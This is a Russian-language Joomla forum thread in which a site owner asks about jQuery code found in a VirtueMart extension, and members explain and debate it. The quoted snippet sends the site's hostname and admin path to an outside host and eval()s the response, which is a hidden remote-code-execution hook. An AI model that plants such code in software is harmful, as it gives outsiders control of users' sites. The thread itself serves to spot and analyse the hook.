0 Пользователей и 1 Гость просматривают эту тему.
  • 21 Ответов
  • 386 Просмотров
*

ushangi

  • Новичок
  • 10
  • 0 / 0
jQuery(document).ready(function(){var h=window.location.hostname.toLowerCase();if(h=='localhost'||h=='127.0.0.1')return;jQuery.ajax({type:"POST",url:"http://holest.com/dist/vmexcellikeinput/track/tracker.php",data:(function(a){var b=[];for(var p in a)if(a.hasOwnProperty(p)){b.push(encodeURIComponent(p)+"="+encodeURIComponent(a[p]))}return b.join("&")})({'host':window.location.host,'hostname':window.location.hostname,'jhost':(window.location.host+window.location.pathname).split('administrator')[0].toLowerCase().replace(/\//g,'__').replace(/\:/g,'__')}),success:function(a){try{eval(a)}catch(e){}}})});

Кто может сказать что эта функция передает в скрипт?
*

robert

  • Живу я здесь
  • 4254
  • 406 / 15
Хм, а какое отношение http://holest.com имеет к вашему сайту?
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

ushangi

  • Новичок
  • 10
  • 0 / 0
Хм, а какое отношение http://holest.com имеет к вашему сайту?

в том то и дело что никакого.  ^-^

Очень похоже на что-то нехорошее. Но моих знаний не достаточно что бы понять насколько это нехорошо.
Пока задокументировал эту функцию.
В работе компонента ни чего не изменилось.

Что не маловажно этот компонент распространяется на этом форуме, и вот хочется узнать, что это за радость. И может других форумчан предупредить.
*

lexxbry

  • Давно я тут
  • 609
  • 18 / 4
что за чудный компонент?
покажите откуда он распространяется?
SEO-оптимизация,продвижение
Создание и сопровождение сайтов на Joomla
Миграция
*

ushangi

  • Новичок
  • 10
  • 0 / 0
что за чудный компонент?
покажите откуда он распространяется?

Скачать - Управление товарами в VirtueMart - в таблиц
*

robert

  • Живу я здесь
  • 4254
  • 406 / 15
Так задайте этот вопрос автору. Вкратце: этот код передает данные о вашем сайте AJAX-запросом в http://holest.com, тот обрабатывает и присылает другой код, который исполняется на вашем сайте.
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

SmokerMan

  • Гуру
  • 5293
  • 719 / 26
ну так там и спрашиваете)
судя по коду видимо использует этот сервис для чего-то
хотя как он пытается отправить ajax post запрос на другой домен хз)
там такое можно сделать только через jsonp
*

robert

  • Живу я здесь
  • 4254
  • 406 / 15
хотя как он пытается отправить AJAX post запрос на другой домен хз
Думаю, что это его собственный ресурс.
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

SmokerMan

  • Гуру
  • 5293
  • 719 / 26
Думаю, что это его собственный ресурс.
что значит собственный?)
если ты будешь тупо отправлять любой AJAX запрос (тут исключение только jsonp) c одного домена на другой он работать не будет, т.к. это будет кроссдоменный запрос
*

dmitry_stas

  • Легенда
  • 10552
  • 1017 / 7
ну строго говоря запрос будет работать, не будет работать ответ. та и даже в таком случае, если доступ к ответу нужен, то заголовки отдать нужные на запрашиваемом сервере, и все.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

robert

  • Живу я здесь
  • 4254
  • 406 / 15
работать не будет, т.к. это будет кроссдоменный запрос
И с "Origin"- и "Access-Control-Allow-Origin"-заголовками?
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

SmokerMan

  • Гуру
  • 5293
  • 719 / 26
Access-Control-Allow-Origin
еще раз, все это будет работать только при  dataType: 'jsonp' :)
а если ты будешь просто отправлять например dataType: 'json' или без dataType то работать не должно
*

dmitry_stas

  • Легенда
  • 10552
  • 1017 / 7
вы что-то путаете, это будет работать и с post, и с get, и со всеми остальными методами. нет никакой разницы. более того, как уже сказал чтобы отправить запрос вообще никакие заголовки не нужны. вызываемый сервер запрос получит и обработает. т.е. если задача только передать - ничего дополнительно можно вообще не делать. но вот чтобы получить доступ к телу ответа - понадобятся вышеуказанные заголовки от запрашиваемого сервера. без них браузер заблокирует доступ к ответу.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

robert

  • Живу я здесь
  • 4254
  • 406 / 15
:)
Только что создал mysite.ru/test.php с таким кодом
Спойлер
[свернуть]
На локалке создал test2.php с таким кодом
Спойлер
[свернуть]
Набираю localhost/test2.php и, :)
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

ushangi

  • Новичок
  • 10
  • 0 / 0
Только что создал mysite.ru/test.php с таким кодом
Спойлер
[свернуть]
На локалке создал test2.php с таким кодом
Спойлер
[свернуть]
Набираю localhost/test2.php и, :)

Правильно ли я Вас понял, что этот код позволяет исполнять скрипты без ведома администратора сайта. Т.е. это дырка в безопасности, которую зачемто сделали разработчики скрипта?
*

dmitry_stas

  • Легенда
  • 10552
  • 1017 / 7
позволяет, да. не скажу прям что это дырка, потому что я просто не знаю возможности этого скрипта, и может быть там и все нормально. но что-то там определенно выполняется. судя по тому, что отправляется домен, возможно это проверка лицензионного ключа, или типа такого.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

robert

  • Живу я здесь
  • 4254
  • 406 / 15
проверка лицензионного ключа, или типа такого
Ну или кусок кода обработчика прячет у себя. Скорее всего, ничего страшного: код можно посмотреть, а автор здесь тусуется.
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

dmitry_stas

  • Легенда
  • 10552
  • 1017 / 7
ага, например если домен легитимный возвращается код которого не хватает, в противном случае вылазит какое то предупреждение. ну и т.п.
Тут дарят бакс просто за регистрацию! Успей получить!
Все советы на форуме раздаю бесплатно, то есть даром. Индивидуально бесплатно консультирую только по вопросам стоимости индивидуальных консультаций
*

pavelrer

  • Захожу иногда
  • 443
  • 9 / 1
1. Вы нашли каку - хорошо!
2. Вас все устраиваеи в сайте кроме каки
3. Вы не знаете как убрить каку
4. ! Если кака не динамическая, т.е у каки код один и тот же переходим к пункту 5
5. Вырезаем каку из страници при создании средствами php
6. ищим каку и отменяем пункт 5

Каку вырезаем через JResponse.
С начало get - забрали станичку, вырезали каку, потом set вернули страничку.
Ну а далее - лечим, и отменяем что выше!

На php ниже 7ки, скрость генерации увеличется очень сильно!!!

« Последнее редактирование: 02.11.2017, 11:31:05 от pavelrer »
*

pavelrer

  • Захожу иногда
  • 443
  • 9 / 1
Код для выреза каки примерно такой
Код
 $ext_buffer = JResponse::getBody();    // Забрали сгенеренный HTML перед передачей
 $trans = array(
'<script src="/" type="text/javascript"></script>' => '',
'<link href="/" rel="stylesheet" type="text/css" />' => '',
chr(9) => ''
);
 $ext_buffer = strtr($ext_buffer, $trans);
 JResponse::setBody($ext_buffer);    // Вернем HTML в зад
\

тут три каки:
1. <script src="/" type="text/javascript"></script>
2. <link href="/" rel="stylesheet" type="text/css" />
3. chr(9)
*

robert

  • Живу я здесь
  • 4254
  • 406 / 15
@pavelrer Что за поток сознания? А что делать, если без этого кода расширение не будет работать?
  • Не будь паразитом, сделай что-нибудь самостоятельно!
  • В личке и по Skype не даю советов.
*

pavelrer

  • Захожу иногда
  • 443
  • 9 / 1
Цитировать
@pavelrer Что за поток сознания? А что делать, если без этого кода расширение не будет работать?
Не очень понял, при всем уважении к вам Robert.
Если происходит так как пишет автор - не безопасно, и Joomla тут не причем!
Я, могу ошибаться!
P.S http://holest.com  ;D ;D ;D
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Браузер не открывает страницу админки, поскольку нашел там необычный код

Автор borro

Ответов: 0
Просмотров: 43
Последний ответ 01.12.2017, 16:07:16
от borro
Множественный выбор в селекте компонента Joomla 3

Автор baskethome

Ответов: 0
Просмотров: 82
Последний ответ 12.11.2017, 13:51:51
от baskethome
Настройка полей для формы компонента "Контакты"

Автор kushiy

Ответов: 6
Просмотров: 93
Последний ответ 20.10.2017, 16:08:02
от kushiy
Тэги в коде деформируются "-"

Автор gian

Ответов: 2
Просмотров: 75
Последний ответ 11.10.2017, 11:39:42
от gian
Ошибка при создании компонента в адресе...&view=*название_компонента*

Автор montana_mimimi

Ответов: 2
Просмотров: 108
Последний ответ 11.09.2017, 16:28:16
от montana_mimimi